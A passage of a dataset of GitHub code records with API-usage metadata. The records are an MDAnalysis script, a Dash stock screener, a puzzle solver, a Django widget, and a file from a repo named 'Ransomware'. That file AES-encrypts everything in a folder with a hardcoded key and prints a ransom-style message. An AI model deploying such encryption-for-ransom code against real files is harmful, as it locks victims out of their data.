"call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 164, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 201, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 221, "usage_type": "call"}, {"api_name": "seaborn.scatterplot", "line_number": 248, "usage_type": "call"}, {"api_name": "seaborn.catplot", "line_number": 258, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 263, "usage_type": "call"}, 
{"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 289, "usage_type": "attribute"}, {"api_name": "scipy.stats.pearsonr", "line_number": 297, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 305, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 326, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 334, "usage_type": "call"}, {"api_name": "seaborn.load_dataset", "line_number": 336, "usage_type": "call"}, {"api_name": "seaborn.pairplot", "line_number": 337, "usage_type": "call"}]} +{"seq_id": "35383435035", "text": "'''Perimeter monitoring for MD simulations using MDAnalysis'''\nimport glob\nimport MDAnalysis\nfrom MDAnalysis.analysis import distances\nimport numpy as np\n\n# Please change the workdir here..\nworkdir = 'REPLACEME'\n\ntop = glob.glob(\"{0}/**/{1}\".format(workdir.rstrip(\"/\"), '*-in-noh2o.pdb'), recursive=True)[0]\ntraj = glob.glob(\"{0}/**/{1}\".format(workdir.rstrip(\"/\"), \"*.dcd\"), recursive=True)[0]\noutputpath = \"{0}/{1}\".format(workdir.rstrip(\"/\"), \"perimeter.csv\")\n\n# For manual mode..\n#top = '/mdspace/mstahnke/2007_2YDV_Na_MD/2YDV_Na_MD-in-noh2o.pdb'\n#traj = '/mdspace/mstahnke/2007_2YDV_Na_MD/2YDV_Na_MD_trj/allframes-noh2o.dcd'\n#outputpath = '/mdspace/mstahnke/2007_2YDV_Na_MD/perimeter.csv'\n\n\nu = MDAnalysis.Universe(top, traj) # Creating MDAnalysis universe aka loading in MD data\nprint('Created MDUniverse successfully.')\n\n# creating atom selections for later use\ns1 = u.select_atoms(\"resid 246 and resname TRP and name CA\")\ns2 = u.select_atoms(\"resid 91 and resname SER and name CA\")\ns3 = u.select_atoms(\"resid 52 and resname ASP and name CA\")\ns4 = u.select_atoms(\"resid 280 and resname ASN and name CA\")\nlig = u.select_atoms(\"resid 400\")\nsodium = u.select_atoms(\"resid 2402\")\n\n# getting distances\ndistdict = {}\ndistpairs = [(s1, s2), (s2, s3), (s3, s4), (s4, s1)]\nstep = -1\nperilist = []\nprint('Starting perimeter calculations.')\nfor ts in u.trajectory:\n step += 1\n peri = 0.0\n for n, distpair in enumerate(distpairs):\n a = distpair[0]\n b = distpair[1]\n # distance array cropped to the distance between selections rounded to two decimal digits\n dist = round(MDAnalysis.analysis.distances.dist(a, b)[2, 0], 2)\n peri += dist\n perilist.append([step, u.trajectory.time, peri])\nperilist = np.array(perilist)\n\nprint('Finished perimeter calculations and writing out file to \\\"{}\\\"'.format(outputpath))\n# adding distances\n# writing out\nif outputpath is not None:\n np.savetxt(outputpath, perilist, delimiter=',') # writing to file\n", "repo_name": "dmachalz/mdanalysis", "sub_path": "perimetermonitor.py", "file_name": "perimetermonitor.py", "file_ext": "py", "file_size_in_byte": 1977, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "glob.glob", "line_number": 10, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 11, "usage_type": "call"}, {"api_name": "MDAnalysis.Universe", "line_number": 20, "usage_type": "call"}, {"api_name": "MDAnalysis.analysis.distances.dist", "line_number": 44, "usage_type": "call"}, {"api_name": "MDAnalysis.analysis", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 53, "usage_type": "call"}]} 
+{"seq_id": "28393631436", "text": "from datetime import date\nimport importlib\nfrom pandas.core.indexes import period\nimport talib \n\n# Stadard Python packages\nimport numpy as np\nimport pandas as pd\n\n# # Standard plotly imports\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objs as go \nimport dash\nfrom dash import dcc\nfrom dash import html\nfrom dash.dependencies import Input, Output\n\n# Our Libraries\nfrom db import config\nfrom db.database import DataBase\n\n\n## Initialize the DB\ndb = DataBase(config.DB_ACCESS[config.DB_LOCATION])\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n# Create the dropdown lists\ndb.execute(\"SELECT id, name, symbol from stocks\")\nrv = db.cursor.fetchall()\n\nticker_dict = { entry[2] : entry for entry in rv}\nticker_dropdown_options = [{\"label\": ticker, \"value\" : ticker} for ticker in list(ticker_dict)]\nallowable_time_frames = [\"1Min\"]\ntime_frame_dropdown_options = [{\"label\": time_frame, \"value\" : time_frame} for time_frame in allowable_time_frames]\ntechnical_periods_dropdown_options = [{\"label\" : i, \"value\" : i} for i in range(5,500)]\n\n\napp.layout = html.Div(children=[\n\n ## Top Section\n html.Div([\n html.H1(\"Stock Screener \"),\n html.H3(id=\"company-name\")\n ], style = {\"textAlign\" : \"center\"} ),\n html.Div([\n html.Div([\n html.Label(\"Ticker:\"),\n dcc.Dropdown(\n id='ticker-dropdown',\n options=ticker_dropdown_options,\n value=\"AAPL\"\n )], style={\"width\" : 100, \"margin-right\": \"30px\"}),\n\n html.Div([\n html.Label(\"Time-Frame:\"),\n dcc.Dropdown(\n id='time-frame-dropdown',\n options=time_frame_dropdown_options,\n value= \"1Min\",\n )], style={\"width\" : 100, \"margin-right\": \"30px\"}),\n \n html.Div([\n html.Label(\"Number Of Periods:\"),\n dcc.Input(\n id='num-periods-input',\n type='number',\n value=200,\n debounce=True\n )], style={\"width\" : 200})\n ],\n style={\"columnCount\" : 3, \"display\" : \"flex\", \"justify-content\" : \"center\"}),\n \n ## Graph\n html.Div(\n id=\"graph-container\",\n children=dcc.Graph(id='quant-chart',\n style={'height' : 650}),\n style={'backgroundColor' : 'rgba(250,250,250,1)'}\n ),\n\n ## Bottm Technical Analysis settings\n html.Div([\n html.Center([html.H3(\"Technical Analysis Settings\")]),\n html.Div(\n [\n html.Div([\n\n html.Div([\n html.Label(\"SMA-Periods:\", style={\"height\":40}),\n html.Label(\"EMA-Periods:\", style={\"height\":40}),\n html.Label(\"Bollinger Bands Period:\", style={\"height\":40})\n ], style={\"width\" : 180}),\n\n html.Div([\n dcc.Dropdown(\n id='sma-periods-dropdown',\n multi = True,\n options = technical_periods_dropdown_options,\n value = [100]\n ),\n dcc.Dropdown(\n id=\"ema-periods-dropdown\",\n multi = True,\n options = technical_periods_dropdown_options,\n value = [20]\n ),\n dcc.Input(\n id='bb-bands-period-dropdown',\n type='number',\n value = 20,\n debounce=True,\n ),\n ], style={\"width\" : 210})\n ],\n style={\"columnCount\":2, \"display\" : \"flex\", \"height\" : 600, \"margin-right\": \"30px\"}),\n\n html.Div([\n\n html.Div([\n html.Label(\"MACD periods:\", style={\"height\":40}),\n html.Label(\"MACD Signal Period:\", style={\"height\":40})\n ], style={\"width\" : 150}),\n\n html.Div([\n dcc.Dropdown(\n id=\"macd-periods-dropdown\",\n multi = True,\n options = technical_periods_dropdown_options,\n value = [20, 12]\n ),\n dcc.Input(\n id='macd-signal-period',\n type='number',\n value=9,\n debounce=True\n )\n 
], style={\"width\" : 210})\n ], style={\"columnCount\":2, \"display\" : \"flex\", \"height\" : 400 })\n ], style={\"columnCount\" : 2, \"display\" : \"flex\", \"justify-content\" : \"center\"})\n ])\n])\n\n\n@app.callback( \n [Output('quant-chart','figure'),\n Output('company-name', 'children')],\n [Input('ticker-dropdown', 'value'),\n Input('time-frame-dropdown', 'value'),\n Input('num-periods-input', 'value'),\n Input('sma-periods-dropdown', 'value'),\n Input('ema-periods-dropdown', 'value'),\n Input('bb-bands-period-dropdown', 'value'),\n Input('macd-periods-dropdown', 'value'),\n Input('macd-signal-period', 'value')])\ndef update_plot(ticker : str,\n time_frame : str,\n periods : int,\n sma_periods : list[int] ,\n ema_periods : list[int] ,\n bb_band_periods: int , \n macd_periods: list[int] ,\n macd_signal_period : int,\n ):\n\n if ticker is None: ticker = \"AAPL\"\n if time_frame is None : time_frame = \"1Day\"\n if periods is None: periods = 200\n if not sma_periods: sma_periods = [100]\n if not ema_periods: ema_periods = [20]\n if bb_band_periods is None: bb_band_periods = 20\n if not macd_periods or len(macd_periods) < 2: macd_periods = [20, 12]\n if macd_signal_period is None : macd_signal_period = 9\n\n max_ta_periods = max(sma_periods + ema_periods + [periods, bb_band_periods, macd_signal_period] + macd_periods)\n\n\n # Get requested num of points\n sql_cmd = f\"\"\"\n SELECT * FROM price_minute \n WHERE stock_id = {ticker_dict[ticker][0]}\n ORDER BY date_time DESC\n LIMIT {periods + max_ta_periods }\n \"\"\"\n db.execute(sql_cmd)\n rv = db.cursor.fetchall()\n\n data = { pd.Timestamp(p[1]) : {\"o\" : p[2], \"h\" : p[3], \"l\" : p[4], \"c\" : p[5], \"v\" : p[6]} for p in rv}\n df = pd.DataFrame(data.values(), data.keys())\n df.sort_index(inplace = True)\n \n # # Create the plot with all of the traces\n fig = make_subplots(rows=4, row_heights=[0.2, 0.6, 0.2, 0.2], vertical_spacing=0, horizontal_spacing=0, shared_xaxes=True)\n\n # Add to the top subplot\n dates = df.index\n rsi = talib.RSI(df.c)\n fig.add_traces(data=[go.Scatter(x=dates, y=rsi, name=\"RSI\", line_width=0.7, showlegend=False),\n go.Scatter(x=dates, y= [70]*len(dates), line=dict(color='black', width=0.5), showlegend=False, hoverinfo='skip'),\n go.Scatter(x=dates, y= [30]*len(dates), line=dict(color='black', width=0.5), showlegend=False, hoverinfo='skip'),\n go.Scatter(x=dates, y= [50]*len(dates), line=dict(color='black', width=0.5 , dash='dash'), showlegend=False, hoverinfo='skip')],\n rows=1,\n cols=1\n )\n \n # # Add the the middle subplot\n bb_high, bb_mid, bb_low = talib.BBANDS(df.c, timeperiod=bb_band_periods)\n trace_data=[go.Candlestick(x=dates,open=df.o, high=df.h, low=df.l, close=df.c, name=ticker),\n go.Scatter(x=dates, y=bb_high, name=\"Bollinger Bands\", line_width=0.5, line_color='rgba(164, 224, 248, 1)', legendgroup=\"bbands\"),\n go.Scatter(x=dates, y=bb_low, name=\"low\", fill='tonexty', line_width=0.5, line_color='rgba(164, 224, 248, 1)', fillcolor='rgba(164, 224, 248, 0.3)', legendgroup=\"bbands\", showlegend=False, hoverinfo='skip'),\n go.Scatter(x=dates, y=bb_mid, name=\"mean\", line_width = 0.5, line_color = 'rgba(164, 224, 255, 1)', legendgroup=\"bbands\",showlegend=False, hoverinfo='skip')\n ]\n\n\n trace_data.extend([go.Scatter(x=dates, y=talib.SMA(df.c, per), name=f\"SMA{per}\", line_width=0.7) for per in sma_periods])\n trace_data.extend([go.Scatter(x=dates, y=talib.EMA(df.c, per), name=f\"EMA{per}\", line_width=0.7) for per in ema_periods]) \n fig.add_traces(data=trace_data, rows=2, 
cols=1)\n\n # # Add Volume plot\n volume_data = [go.Bar(x=dates, y=df.v, name=\"Volume\", showlegend=False),\n go.Scatter(x=dates, y=talib.OBV(df.c, df.v), name=\"OBV\", line_width=0.5)]\n fig.add_traces(data=volume_data, rows=3, cols=1)\n\n # # # Add to the bottom subplot\n macd, macdsignal, macdhist = talib.MACD(df.c, fastperiod = min(macd_periods), slowperiod = max(macd_periods), signalperiod = macd_signal_period)\n \n gtz_mask = (macdhist > 0).to_numpy()\n ltz_mask = (macdhist <= 0).to_numpy()\n fig.add_traces(data=[go.Scatter(x=dates, y=macd, name=f\"MACD({max(macd_periods)},{min(macd_periods)}, {macd_signal_period})\", line_width=0.7, line_color=\"black\", legendgroup=\"macd\"),\n go.Scatter(x=dates, y=macdsignal, name=f\"Signal({macd_signal_period})\", line_width=0.7, line_color=\"red\", showlegend=False, legendgroup=\"macd\"),\n go.Bar(x=dates[gtz_mask], y=macdhist[gtz_mask], marker=dict(color='green'), showlegend=False, hoverinfo='skip'),\n go.Bar(x=dates[ltz_mask], y=macdhist[ltz_mask], marker=dict(color='red'), showlegend=False, hoverinfo='skip')],\n rows=4,\n cols=1)\n\n fig.update_layout(\n plot_bgcolor='rgba(250,250,250,1)',\n paper_bgcolor='rgba(250,250,250,1)',\n hovermode='x unified',\n legend=dict(orientation=\"h\", xanchor=\"center\", y=1.1, x=0.5),\n ) \n\n\n fig.update_xaxes(rangeslider_visible=False, visible=True, range = (dates[max_ta_periods], dates[-1]))\n fig.update_yaxes(row=1, col=1, title=\"RSI\", tickvals = [30, 50, 70])\n fig.update_yaxes(row=2, col=1, title=\"Share Price\")\n fig.update_yaxes(row=3, col=1, title=\"Volume\")\n fig.update_yaxes(row=4, col=1, title=\"MACD\")\n\n\n\n return [fig, ticker_dict[ticker][1]]\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n \n", "repo_name": "jkalish14/AlgoTrading_Colab", "sub_path": "algotradingcolab/stockScreener.py", "file_name": "stockScreener.py", "file_ext": "py", "file_size_in_byte": 10675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "db.database.DataBase", "line_number": 24, "usage_type": "call"}, {"api_name": "db.config.DB_ACCESS", "line_number": 24, "usage_type": "attribute"}, {"api_name": "db.config", "line_number": 24, "usage_type": "name"}, {"api_name": "db.config.DB_LOCATION", "line_number": 24, "usage_type": "attribute"}, {"api_name": "dash.Dash", "line_number": 28, "usage_type": "call"}, {"api_name": "db.execute", "line_number": 31, "usage_type": "call"}, {"api_name": "db.cursor.fetchall", "line_number": 32, "usage_type": "call"}, {"api_name": "db.cursor", "line_number": 32, "usage_type": "attribute"}, {"api_name": "dash.html.Div", "line_number": 41, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 41, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 44, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 44, "usage_type": "name"}, {"api_name": "dash.html.H1", "line_number": 45, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 45, "usage_type": "name"}, {"api_name": "dash.html.H3", "line_number": 46, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 46, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 48, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 48, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 49, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 49, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 50, "usage_type": "call"}, 
{"api_name": "dash.html", "line_number": 50, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 51, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 51, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 57, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 57, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 58, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 58, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 59, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 59, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 65, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 65, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 66, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 66, "usage_type": "name"}, {"api_name": "dash.dcc.Input", "line_number": 67, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 67, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 77, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 77, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 79, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 79, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 85, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 85, "usage_type": "name"}, {"api_name": "dash.html.Center", "line_number": 86, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 86, "usage_type": "name"}, {"api_name": "dash.html.H3", "line_number": 86, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 87, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 87, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 89, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 89, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 91, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 91, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 92, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 92, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 93, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 93, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 94, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 94, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 97, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 97, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 98, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 98, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 104, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 104, "usage_type": "name"}, {"api_name": "dash.dcc.Input", "line_number": 110, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 110, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 120, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 120, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 122, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 122, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 123, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 123, "usage_type": "name"}, {"api_name": 
"dash.html.Label", "line_number": 124, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 124, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 127, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 127, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 128, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 128, "usage_type": "name"}, {"api_name": "dash.dcc.Input", "line_number": 134, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 134, "usage_type": "name"}, {"api_name": "db.execute", "line_number": 187, "usage_type": "call"}, {"api_name": "db.cursor.fetchall", "line_number": 188, "usage_type": "call"}, {"api_name": "db.cursor", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pandas.Timestamp", "line_number": 190, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 191, "usage_type": "call"}, {"api_name": "plotly.subplots.make_subplots", "line_number": 195, "usage_type": "call"}, {"api_name": "talib.RSI", "line_number": 199, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 200, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 200, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 201, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 201, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 202, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 202, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 203, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 203, "usage_type": "name"}, {"api_name": "talib.BBANDS", "line_number": 209, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Candlestick", "line_number": 210, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 210, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 211, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 211, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 212, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 212, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 213, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 213, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 217, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 217, "usage_type": "name"}, {"api_name": "talib.SMA", "line_number": 217, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 218, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 218, "usage_type": "name"}, {"api_name": "talib.EMA", "line_number": 218, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 222, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 222, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 223, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 223, "usage_type": "name"}, {"api_name": "talib.OBV", "line_number": 223, "usage_type": "call"}, {"api_name": "talib.MACD", "line_number": 227, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 231, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 231, "usage_type": "name"}, 
{"api_name": "plotly.graph_objs.Scatter", "line_number": 232, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 232, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 233, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 233, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 234, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 234, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 148, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 149, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 150, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 151, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 152, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 153, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 154, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 155, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 156, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "39168221995", "text": "from data import requirements\nfrom time import time\nimport re\n\nstart_time = time()\n\nreq_pattern = re.compile('Step (?P.).* step (?P.)')\ntasks = {}\n\n# Extract tasks and dependecies\nfor requirement in requirements:\n\tparsed = req_pattern.search(requirement).groupdict()\n\ttask = parsed['step']\n\ttask_dep = parsed['dependency']\n\tif task not in tasks:\n\t\ttasks[task] = set()\n\tfor dep_task in task_dep:\n\t\tif dep_task not in tasks:\n\t\t\ttasks[dep_task] = set()\n\ttasks[task].add(task_dep)\n\ntodo = set(tasks.keys())\ndone = []\ntodo_changed = True\nwhile len(todo) > 0:\n\t# Search available tasks\n\tavailable = set()\n\tfor task in todo:\n\t\tif set(tasks[task]).issubset(set(done)):\n\t\t\tavailable.add(task)\n\n\t# Do first task alphabetically\n\ttask_to_do = sorted(list(available))[0]\n\tdone.append(task_to_do)\n\ttodo.remove(task_to_do)\n\nprint('Solution', ''.join(done))\n\nprint('Finished in', time() - start_time)\n", "repo_name": "mikeful/aoc_2018", "sub_path": "07/tasklist3.py", "file_name": "tasklist3.py", "file_ext": "py", "file_size_in_byte": 903, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 5, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 7, "usage_type": "call"}, {"api_name": "data.requirements", "line_number": 11, "usage_type": "name"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "9780450907", "text": "#!/usr/bin/python3.6\n# -*- coding: utf-8 -*-\n\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Counter\nimport argparse\nimport os\nimport FileWalker\nimport Crypter\n\n#-------------\n# A Senha pode ter os seguintes tamanhos:\n# 128/192/256 bits - 8 bits = 1 byte = 1 letra unicode\n#-------------\n\nHARDCODED_KEY = 'hackware strike force strikes u!'\n\ndef get_parser():\n parser=argparse.ArgumentParser()\n parser.add_argument(\n '-d',\n '--decrypt', \n help='Desencripta os arquivos [default:no]',\n action='store_true'\n )\n return parser\n\n#Logica Principal\ndef main():\n parser = get_parser()\n args = vars(parser.parse_args())\n is_decrypt = args ['decrypt']\n\n if 
is_decrypt:\n print('''\n HACKWARE STRIKE FORCE\n --------------------------------------------\n Seus arquivos foram criptografados.\n Para decriptá-los utilize a seguinte senha'{}'\n '''.format(HARDCODED_KEY))\n key= input('Digite a senha > ')\n else:\n if HARDCODED_KEY:\n key = HARDCODED_KEY\n\n\n #Gera a Cifra de cripto\n ctr = Counter.new(128)\n crypto = AES.new(key, AES.MODE_CTR, counter=ctr)\n\n if not is_decrypt:\n cryptoFn = crypto.encrypt\n\n else:\n cryptoFn = crypto.decrypt\n\n #Caminho inicial do walker\n start_path = os.path.abspath(os.path.join(os.getcwd(), 'files'))\n startDirs = [start_path] #Pode especificar mais diretórios\n\n for currentDir in startDirs:\n for filename in FileWalker.walker(currentDir):\n Crypter.write_to_file(filename, cryptoFn)\n\n for _ in range (100):\n pass\n\nif __name__ == '__main__':\n main()\n\n\n", "repo_name": "thegraciano/Ransomware", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1696, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "Crypto.Util.Counter.new", "line_number": 48, "usage_type": "call"}, {"api_name": "Crypto.Util.Counter", "line_number": 48, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 49, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 49, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CTR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 58, "usage_type": "call"}, {"api_name": "FileWalker.walker", "line_number": 62, "usage_type": "call"}, {"api_name": "Crypter.write_to_file", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "40216305178", "text": "# -*- coding: utf-8 -*-\n# This code stolen from http://djangosnippets.org/snippets/951/\nfrom django import forms\nfrom django.utils.safestring import mark_safe\nfrom django.utils.encoding import force_unicode\n\nclass SubmitButton(forms.Widget):\n \"\"\"\n A widget that handles a submit button.\n \"\"\"\n def __init__(self, name, value, label, attrs):\n self.name, self.value, self.label = name, value, label\n self.attrs = attrs\n\n def __unicode__(self):\n final_attrs = self.build_attrs(\n self.attrs,\n type=\"submit\",\n name=self.name,\n value=self.value,\n )\n return mark_safe(u'%s' % (\n forms.widgets.flatatt(final_attrs),\n self.label,\n ))\n\nclass MultipleSubmitButton(forms.Select):\n \"\"\"\n A widget that handles a list of submit buttons.\n \"\"\"\n def __init__(self, attrs={}, choices=()):\n self.attrs = attrs\n self.choices = choices\n\n def __iter__(self):\n for value, label in self.choices:\n yield SubmitButton(self.name, value, label, self.attrs.copy())\n\n def __unicode__(self):\n return '